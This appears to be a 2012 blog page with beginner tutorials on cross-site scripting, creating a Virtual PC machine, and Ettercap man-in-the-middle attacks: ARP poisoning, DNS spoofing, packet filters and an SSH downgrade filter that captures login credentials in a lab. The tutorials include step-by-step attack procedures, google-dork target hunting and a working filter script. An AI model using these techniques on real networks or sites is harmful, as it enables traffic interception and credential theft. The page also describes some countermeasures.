google analytics

Thursday, 20 December 2012

CROSS SITE SCRIPTING


Cross Site Scripting(XSS) Complete Tutorial for Beginners~ Web Application Vulnerability



What is XSS?
Cross Site Scripting also known as XSS , is one of the most common web appliction vulnerability that allows an attacker to run his own client side scripts(especially Javascript) into web pages viewed by other users. In a typical XSS attack, a hacker inject his malicious javascript code in the legitimate website . When a user visit the infected or a specially-crafted link , it will execute the malicious javascript. A successfully exploited XSS vulnerability will allow attackers to do phishing attacks, steal accounts and even worms.

Example :Let us imagine, a hacker has discovered XSS vulnerability in Gmail and inject malicious script. When a user visit the site, it will execute the malicious script. The malicious code can be used to redirect users to fake gmail page or capture cookies. Using this stolen cookies, he can login into your account and change password.
It will be helpful for understanding XSS , if you have the following prerequisite:
  • Strong Knowledge in HTML,javascript(Reference).
  • Basic Knowledge in HTTP client-Server Architecure(Reference)
  • [optional]Basic Knowledge about server side programming(php,asp,jsp)

XSS Attack:
Step 1: Finding Vulnerable Website
Hackers use google dork for finding the vulnerable sites for instance  "?search=" or ".php?q=" .  1337 target specific sites instead of using google search.  If you are going to test your own site, you have to check every page in your site for the vulnerability.

Step 2: Testing the Vulnerability:
First of all, we have to find a input field so that we can inject our own script, for example: search box, username,password or any other input fields.


Test 1 :
Once we found the input field, let us try to put some string inside the field, for instance let me input "BTS". It will display the  result .

Now right click on the page and select view source.   search for the string "BTS" which we entered in the input field.  Note the location where the input is placed.

Test 2:
Now we are going to check whether the server sanitize our input or not.  In order to do this , let us input the <script> tag inside the input field.
View the source of the page . Find the location where input displayed place in previous test.

Thank god, our code is not being sanitized by the server and the code is just same as what we entered in the field. If the server sanitize our input, the code may look like this &lt;script&gt;. This indicates that the website vulnerable to XSS attack and we can execute our own scripts .

Step 3: Exploiting the vulnerability
Now we know the site is somewhat vulnerable to XSS attack.  But let us make sure whether the site is completely vulnerable to this attack by injecting a full javascript code.  For instance, let us input <script>alert('BTS')</script> .

Now it will display pop-up box with 'BTS' string. Finally, we successfully exploit the XSS .  By extending the code with malicious script, a hacker can do steal cookies or deface the site and more.

Types of XSS Based on persisting capability:
Based one Persistence capability, we can categorize the XSS attack into two types namely Persistent and Non-Persistent.

Persistent XSS:

The Persistent or Stored XSS attack occurs when the malicious code submitted by attacker is saved by the server in the database, and then permanently it will be run in the normal page.

For Example:   
Many websites host a support forum where registered users can ask their doubts by posting message  , which are stored in the database.  Let us imagine , An attacker post a message containing malicious javascript code instead.  If the server fail to sanitize the input provided, it results in execution of injected script.  The code will be executed whenever a user try to read the post. If suppose the injected code is cookie stealing code, then it will steal cookie of users who read the post. Using the cookie, attacker can take control of your account.


Non-Persistent XSS:

Non-Persistent XSS, also referred as Reflected XSS , is the most common type of XSS found now a days. In this type of attack, the injected code will be send to the server via HTTPrequest.  The server embedd the input with the html file and return the file(HTTPResponse) to browser.  When the browser executes the HTML file, it also execute the embedded script.  This kind of XSS vulnerability frequently occur in search fields.

Example:
Let us consider a project hosting website.  To find our favorite project, we will just input the related-word in the search box .  When searching is finished, it will display a message like this "search results for yourword " .  If the server fail to sanitize the input properly, it will results in execution of injected script.

In case of reflected XSS attacks, attacker will send the specially-crafted link to victims and trick them into click the link. When user click the link, the browser will send the injected code to server, the server reflects the attack back to the users' browser.  The browser then executes the code .

In addition to these types, there is also third  type of attack called DOM Based XSS attack, i will explain about this attack in later posts.

What can an attacker do with this Vulnerability?
  • Stealing the Identity and Confidential Data(credit card details).
  • Bypassing restriction in websites.
  • Session Hijacking(Stealing session)
  • Malware Attack
  • Website Defacement
  • Denial of Service attacks(Dos)

Disclaimer:
This article is intended for educational purpose only.

Wednesday, 12 December 2012

HOW TO CREATE A VIRTUAL MACHINE


Beginner: How To Create a Virtual Machine in Windows 7 Using Virtual PC

header_vpc
Microsoft Virtual PC is a free application that helps you create your own virtual machines inside your current operating system, so you can test software, or learn a new environment easily. Here’s how to get started.

Using Windows Virtual PC

First, you need to download Virtual PC from Microsoft’s web site. You’ll want to make sure to select the right Windows 7 edition from the drop-down menu and then select Windows Virtual PC.
It will ask you to install Virtual PC as a Windows software update.
You will need to restart after the installation is done.
After rebooting, you can find Windows Virtual PC in your start menu and select it to open the program.
Click on Create virtual machine in the new window that opened.
Now, you can write the name for your new Virtual Machine and the location to store the virtual machine file.
In the next window, you can select the amount of RAM memory to assign to your virtual machine.
In the next window, you will create a virtual hard disk where you will install your virtual operating system. You can select between a dynamically expanding virtual hard disk (it will grow according to your virtual machine space requirements), use an existing virtual hard disk or use advanced options.
In the advanced options window, you can select to create a dynamically expanding hard disk (the hard drive will grow as your virtual machine needs), a fixed sized hard drive (you assign the amount of storage for it) and a differencing hard drive (the changes will be stored in a different hard drive so the original hard drive can be intact)
We will use a dynamically virtual hard drive for this example.
You can now select the location for your virtual hard drive in your computer and the name for it.
As we selected the dynamically expanding virtual hard drive, we will specify the maximum storage space for it to grow in the next window.
And that’s pretty much it!
You have created a virtual machine and only need to install the operating system.
You can go to Virtual PC again, and will find your new Virtual Machine. Right click on it to select the settings or click on the Settings menu.
In the settings windows, you can specify where the installation disk for your new operating system is located to install it in your new virtual machine.
Go to DVD Drive and select Access a physical drive if you loaded the installation CD / DVD in the computer’s Rom.
Or select Open an ISO image to select an image with the installation files to install an operating system on your new virtual machine.
Once you’ve started up the virtual machine, just follow through the normal installation prompts to create your virtual operating system.

Tuesday, 11 December 2012

MAN IN THE MIDDLE ATTACKS-USING ETTERCAP


After the ARP poisoning tutorial, the victim ARP cache has been changed to force the connections from the Windows machine to go trough the Ettercap machine to reach the desired destination.

The network scenario diagram is available in the Ettercap introduction page.

As the trap is set, we are now ready to perform "man in the middle" attacks, in other words to modify or filter the packets coming from or going to the victim.

To launch attacks, you can either use an Ettercap plugin or load a filter created by yourself.

1. PLUGINS2. FILTERS

 PLUGINS

We will use here the Ettercap plugin called dns_spoof to test a very famous attack, the DNSspoofing where the pirate answers DNS requests at the place of the DNS server.
When you access your favourite web site with your browser, your machine (it has an IP address of 192.168.1.2 in our case study) will first ask the DNS server for the IP address matching yourURL and then the browser will display the web page.
With DNS spoofing, when the DNS request is sent, the spoofer answers at the place of the DNS server and provides another IP address.
The consequences will be that you have the feeling to reach the desired web site but this will be in fact the pirate's website because of the different IP address.

The attack can very dangerous when the pirate spoofs important websites such as your bank website. His/Her fake web server will have exactly the same interface than the real bank web site. So, the pirate will wait for you to enter your credentials on his website to capture them.

Let's proceed with the DNS spoofing attack.
The first thing to do is to set the configuration file called etter.dns in the /usr/share/ettercap/ directory.

#vim /usr/share/ettercap/etter.dns
In the file you can find an explanation about its configuration.
Here is the content of our etter.dns file.

linux1.org
*.linux.com
www.linux.org
A
A
PTR
198.182.196.56
198.182.196.56
198.182.196.56
It means that when you open www.linux1.org in your web browser, you will see the content of the www.linux.org website.

To start the DNS spoofing, you need to activate the dns_spoof plugin in the Ettercap graphical interface. Remember that you need to follow the arp poisoining tutorial before doing the steps below.

Plugins -> Manage the plugins
openmaniak ettercap man in the middle attack Manage the plugins

Click on the dns_spoof line to activate the plugin. This will tag the line with a star.

openmaniak ettercap  man in the middle attack dns_spoof line

Then enter www.linux1.org in a web browser.
You can see that the content of the page opened is the one that matches the IP address you added in the etter.dns file and not the real IP address matching the www.linux1.org address.

openmaniak ettercap  man in the middle attack

                       man in the middle attack openmaniak ettercap
openmaniak ettercap  man in the middle attack

To stop the DNS spoofing:

Start -> Stop sniffing
Although we stopped the attack, you can see that the www.linux1.org address in your web browser still displays the content of the www.linux.org web site. This is because of the DNS cache on our client machine 192.168.1.2. By default, Windows keeps a DNS entry for 300 seconds or 5 minutes in its cache. So either you wait quietly for 5 minutes or, better, you flush or clear the DNS cache with the following command:

Launch a command line interface window as follow:
Start -> Run -> cmd

C:\Documents and Settings\administrator>ipconfig /flushdns
On an Ubuntu machine use the following command: "/etc/init.d/dns-clean start"
To see your DNS cache:

C:\Documents and Settings\administrator>ipconfig /displaydns
If you want to change the default DNS cache time, you have to modify an entry in the Windows registry.
Be careful when playing with the registry, an incorrect configuration can damage your system and prevent it from rebooting.

Start -> Run -> arborescence below:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\

Click on "NegativeCacheTime" in the right panel:

openmaniak ettercap registry negativecachetime man in the middle attack

click on the "Decimal" button and finally enter your new value for the DNS cache time.

 man in the middle attack openmaniak ettercap registry negativecachetime

 Top of the page


 FILTERS

The filters allow you to change the content of packets.
To create a filter, a configuration file must be compiled before being able to be used as a filter. You can find some predefined examples in the /usr/share/ettercap/ directory.
We will study two examples based on Ettercap filters.

1. FTP prompt change
2. SSH downgrade attack

 1. FTP Prompt change:

We chose in our simple example to change the prompt of a FTP connection. Below is our configuration file called test_filter in the /usr/share/ettercap directory.

# replace the FTP prompt
if (tcp.src == 21 && search(DATA.data, "ProFTPD")) {
   replace("ProFTPD","TeddyBearFTPD);
}


Then you need to compile the file with etterfilter because Ettercap can only load compiled files.

#etterfilter etter_filter -o etter_filter_compil
This will create a compiled file called etter_filter_comp.

Load the filter in Ettercap:

Filters -> Load a filter...
openmaniak ettercap man in the middle attack Load a filter

openmaniak ettercap man in the middle attack Load a filter

Now, it's time to test a FTP connection with our client machine 192.168.1.2. Tests are performed before and after the Ettercap filtering.
"xyz" is the website name and "1.2.3.4" an IP address.

(Of course, you must be set as "man in the middle". If it's not already the case, follow the arp poisoning tutorial.)

C:\Documents and Settings\Administrator>ftp www.xyz.com
Connected to xyz.com.
220 "ProFTPD 1.3.0a Server ("ProFTPD) [1.2.3.4]
User (xyz.com:(none)):


C:\Documents and Settings\Administrator>ftp www.xyz.com
Connected to xyz.com.
220 "TeddyBear FTPD 1.3.0a Server ("TeddyBear FTPD) [1.2.3.4]
User (xyz.com:(none)): 



 Top of the page     Filter menu

 2. SSH Downgrade attack:

A particularly crafty attack called "the downgrade attack" can be used once in "the man in the middle" position. The principle is to downgrade a protocol version by changing data inside packets, to another version known to be vulnerable.

---------------- Principle ----------------

SSH is the most famous example of a downgrade attack where the attacker forces the client and the server to use the insecure SSH1 protocol.

The client sends a request to establish a SSH link to the server and asks it for the version it supports.
The server answers either with:
- ssh-2.xx The server supports only SSH2
- ssh-1.99 The server supports SSH1 and SSH2
- ssh-1.51 The server supports only SSH1

In our example, the server is configured to support both SSH1 and SSH2 and the client is set to use SSH2 and SSH1 but SSH2 as a preference.

Suppose the server is configured for SSHv1 and SSHv2, the hacker will change the answer by modifying the "1.99" string to "1.51" to indicate to the client that the server supports only SSH1 and thus forces the client to open a SSH1 link.
The client who thinks to use the secure SSH2 protocol will login with SSH1 and the password will be immediately captured by the hacker because of the SSH1 weak password authentication mechanism.

putty ssh downgrade attack

---------------- Case Study Installation ----------------

a. SSH Server: OpenSSH on Linux
b. SSH client: Putty on Windows.
c. Hacker machine: Ettercap.

a. Server installation:

#apt-get install openssh-server

By default, only SSH2 is enabled on the OpenSSH server. To activate SSH1, you have first to open the /etc/ssh/sshd_config file and update the line beginning with "Protocol":

#vim /etc/ssh/sshd_config
Protocol 1,2
You then need to create a SSH1 key pair otherwise you will have the following error after the SSH server reboot:
Disabling protocol version 1. Could not load host key.

#ssh-keygen -t rsa1 -f /etc/ssh/ssh_host_key -N ""
Add the key path into the sshd_config file:

HostKey /etc/ssh/ssh_host_key
Finally, restart the server:

#/etc/init.d/ssh restart
   * Restarting OpenBSD Secure Shell server sshd

The SSH server is now configured to accept SSH1 and SSH2 and thus provides a "ssh-1.99" response. We can check it with the following command:

#telnet server_ip_address 22
Trying server_ip_address...
Connected to server_ip_address.
Escape character is '^]'.
SSH-1.99-OpenSSH_4.6p1 Debian-5ubuntu0.1


b. Client installation:

Download the Putty client. Putty is a well known open source SSH client for windows.
Keep the SSH default Putty configuration. SSH1 and SSH2 are accepted but SSH2 preferred.

putty ssh2 version

c. Ettercap installation:

Follow the Ettercap installation tutorial to install Ettercap and the ARP poisoning tutorial to set our machine as "Man in the Middle".

Our laboratory is now operational, we can launch the SSH downgrade attack:

---------------- Launch the SSH downgrade attack ----------------

Ettercap offers a predefined configuration file for the SSH downgrade attack. The file is /usr/share/ettercap/etter_filter_ssh.
We can check the content of the file but nothing has to be modified.

#cat /usr/share/ettercap/etter.filter.ssh
if (ip.proto == TCP) {
if (tcp.src == 22) {
if ( replace("SSH-1.99", "SSH-1.51") ) {
msg("[SSH Filter] SSH downgraded from version 2 to 1\n");
} else {
if ( search(DATA.data, "SSH-2.00") ) {
msg("[SSH Filter] Server supports only SSH version 2\n");
} else {
if ( search(DATA.data, "SSH-1.51") ) {
msg("[SSH Filter] Server already supports only version 1\n");
}
}
}
}
}
We just need to compile the file to create the filter.

#etterfilter etter_filter_ssh -o etter_filter_ssh_co
We are now ready to load the filter.

Filters -> Load a filter...
ettercap load ssh downgrade filter

Select the compiled file.

ettercap load ssh downgrade filter file

The filter is now loaded. We are ready to open an SSH link from the client.

ettercap ssh downgrade filter loaded

The client, the hacker and the server machines are now configured correctly.
We can test opening an SSH link from the Putty client.
Open Putty, on the left, click on "Session", then enter the SSH server IP address (192.168.1.68 in our example) and check the "SSH" radio button. Click on the "Open" button to connect to the SSH server.

ettercap open ssh link with putty

It's time to see if everything is working fine and check on the hacker machine if we catch the SSH1 password.

ettercap ssh1 downgrade filter credentials

The attack works fine!

As shown, Ettercap has:
1. Downgraded the SSH version:
2. Captured the SSH1 credentials:
[SSH Filter] SSH downgraded from version 2 to 1
SSH : 192.168.1.68:22 -> USER:guillfab PASS:T0rduT1m
We can observe a Wireshark capture from the SSH server during the SSH link establishment. (Click to enlarge)

wireshark ssh1 initialisation process

1. The server (192.168.1.68) sends a "1.99" answer to the client (192.168.1.132) meaning it supports SSH1 and SSH2.
2. The client establishes an SSH1 link because the "1.99" server answer was changed to "1.51" by the hacker.
3. Encrypted SSH1 packets

---------------- Countermeasures ----------------

How to avoid SSH downgrade attacks ?

SSH1 must NEVER be used on a SSH server and SSH2 forced on the client.
By default, only SSHv2 is enabled on the OpenSSH server while it is frequent to see SSHv1 and SSHv2 enabled on the clients such as Putty.

Let's see how we can secure the SSH client and server:

SSH server:
Open the /etc/ssh/sshd_config file and check that only the SSH2 protocol is enabled.

#vim /etc/ssh/sshd_config
Protocol 2
If you make a change, restart the server with "#/etc/init.d/ssh restart".
Then to be sure your server really supports only SSH2, do the following command:

#telnet server_ip_address 22
Trying server_ip_address...
Connected to server_ip_address.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.6p1 Debian-5ubuntu0.1

The value in red must not be under 2.0.

SSH client:
Force the SSH2 protocol on the client.
On Putty, in the left panel, click on "Connection" then "SSH". Finally, check the "2only" radio button.

putty ssh2 version




As a general security rule, try always not to use the default settings, but to force the security level as high as possible both on a server AND its clients. 

ARP POISONING USING ETTERCAP



In this first tutorial, we will place our Ettercap machine as "man in the middle" after an ARP spoofing attack.

The network scenario diagram is available in the Ettercap introduction page.

The first thing to do is to set an IP address on your Ettercap machine in the same IP subnet than the machine you want to poison. For our tutorial the 192.168.1.100 IP address is used.
See the networking tutorial for detailed explanations about how to set an IP address on your Linux box.

As a reminder, Ettercap will need root access to be launched then it will be supported by the 'nobody' user.


 1. ARP SPOOFING

 Open Ettercap in graphical mode

#ettercap -G
openmaniak ettercap

 Select the sniff mode

Sniff -> Unified sniffing
openmaniak ettercap man in the middle attack sniff united sniffingarrow blue
openmaniak ettercap





 Scan for host inside your subnet

Hosts -> Scan for hosts
The network range scanned will be determined by the IP settings of the interface you have just chosen in the previous step.

openmaniak ettercap man in the middle attack arrow blue
openmaniak ettercap  man in the middle attack sniff united sniffing








 See the MAC & IP addresses of the hosts inside your subnet.

openmaniak ettercap man in the middle attack


 Select the machines to poison

We chose to ARP poison only the windows machine 192.168.1.2 and the router 192.168.1.1.
Highlight the line containing 192.168.1.1 and click on the "target 1" button.
Highlight the line containing 192.168.1.2 and click on the "target 2" button.
If you do not select any machines as target, all the machine inside the subnet will be ARP poisoned.

openmaniak ettercap man in the middle attack

 Check your targets

openmaniak ettercap man in the middle attack

man in the middle attack openmaniak ettercap

 Start the ARP poisoning

Mitm -> Arp poisoning
man in the middle attack openmaniak ettercaparrow blue
man in the middle attack openmaniak ettercap





 Start the sniffer

Finally, start the sniffer to collect statistics.

Start -> Start sniffing
man in the middle attack openmaniak ettercap

 Top of the page


 ARP TRAFFIC:

On the Windows machine, with the help of Wireshark, we can compare the ARP traffic before and after the poisoning:

As a reminder: (See the network diagram)
192.168.1.1
192.168.1.2
192.168.1.100
(Router)
(Windows)
(Pirate)
11:22:33:44:11:11
11:22:33:44:55:66
11:22:33:44:99:99
 Before the poisoning
Before being able to communicate together, the router and the Windows machine send an ARPbroadcast to find the MAC address of the other.

No
1
2
3
4
Source
11:22:33:44:55:66
11:22:33:44:11:11
11:22:33:44:11:11
11:22:33:44:55:66
Destination
11:22:33:44:11:11
11:22:33:44:55:66
11:22:33:44:55:66
11:22:33:44:11:11
Prot
ARP
ARP
ARP
ARP
Info
who has 192.168.1.1? Tell 192.168.1.2
192.168.1.1 is at 11:22:33:44:11:11
who has 192.168.1.2? Tell 192.168.1.1
192.168.1.2 is at 11:22:33:44:55:66

                                        arrow blue

 After the poisoning
The router ARP broadcast request is answered by the Windows machine similarly than in the previous capture.
The difference between the two steps comes from the fact that there is no request coming from Windows (192.168.1.2) to find the MAC address associated to the router (192.168.1.1) because the poisoner continuously sends ARP packets telling the Windows machine that 192.168.1.1 is associated to his own MAC address (11:22:33:44:99:99) instead of the router MAC address (11:22:33:44:11:11).

No
1
2
3
4
Source
11:22:33:44:11:11
11:22:33:44:55:66
11:22:33:44:99:99
11:22:33:44:99:99
Destination
11:22:33:44:55:66
11:22:33:44:11:11
11:22:33:44:55:66
11:22:33:44:55:66
Prot
ARP
ARP
ARP
ARP
Info
who has 192.168.1.2? Tell 192.168.1.1
192.168.1.2 is at 11:22:33:44:55:66
192.168.1.1 is at 11:22:33:44:99:99
192.168.1.1 is at 11:22:33:44:99:99
 Top of the page


 ARP TABLES:

If we look at the router and Windows machine ARP table, we see that the Ettercap Linux machine poisoned their ARP table and replaced the router or Windows machine MAC addresses by its own MAC address.
This means that the packets between the Windows machine and the router will transit through the Ettercap machine.
Let's see if we successfully poisoned the router and windows machine ARP table:

--------------------Windows machine 192.168.1.2--------------------
Launch a command line interface window as follow:
Start -> Run -> cmd

C:\Documents and Settings\administrator>arp -a
Interface�: 192.168.1.2 --- 0x2
Internet Address
192.168.1.1
192.168.1.100
Physical Address
11-22-33-44-11-11
11-22-33-44-99-99
Type
dynamic
dynamic

              arrow blue

Interface�: 192.168.1.2 --- 0x2
Internet Address
192.168.1.1
192.168.1.100
Physical Address
11-22-33-44-99-99
11-22-33-44-99-99
Type
dynamic
dynamic

--------------------Linux machine 192.168.1.100--------------------
#arp -a
?
?
(192.168.1.1)
(192.168.1.2)
at
at
11:22:33:44:11:11
11:22:33:44:55:66
[ether]
[ether]
on
on
eth0
eth0
--------------------router openmaniak ciscoRouter 192.168.1.1--------------------
>show arp
Protocol
Internet
Internet
Address
192.168.1.2
192.168.1.100
Age (min)
194
128
Hardware Addr
1122.3344.5566
1122.3344.9999
Type
ARPA
ARPA
interface
FastEthernet0/0
FastEthernet0/0
              arrow blue

Protocol
Internet
Internet
Address
192.168.1.2
192.168.1.100
Age (min)
194
128
Hardware Addr
1122.3344.9999
1122.3344.9999
Type
ARPA
ARPA
interface
FastEthernet0/0
FastEthernet0/0
If you have a Netscreen (Juniper) device, use the following command to display the ARP table:

>get arp
On a Vyatta router:

>show arp

 Top of the page


 STOPPING THE ARP SPOOFING:

openmaniak ettercap

Ettercap is pretty effective. After the attack, it will "re-arp" the victims. In other words the victims ARP cache will again contain correct entries .

If the cache still contains poisoned IP - MAC address correspondences, you can either wait some minutes, which is the time needed for the entry ARP cache to refresh itself, or, better, clear the ARP cache.

On a Microsoft machine:

C:\Documents and Settings\admin>arp -d *
On an Ubuntu or Debian Linux:

#arp -d ip_address
On a Cisco router:

#clear arp-cache


 CONCLUSION

After this tutorial, the ARP table of the router and the Windows machine are poisoned: The Linux machine is now "in the middle".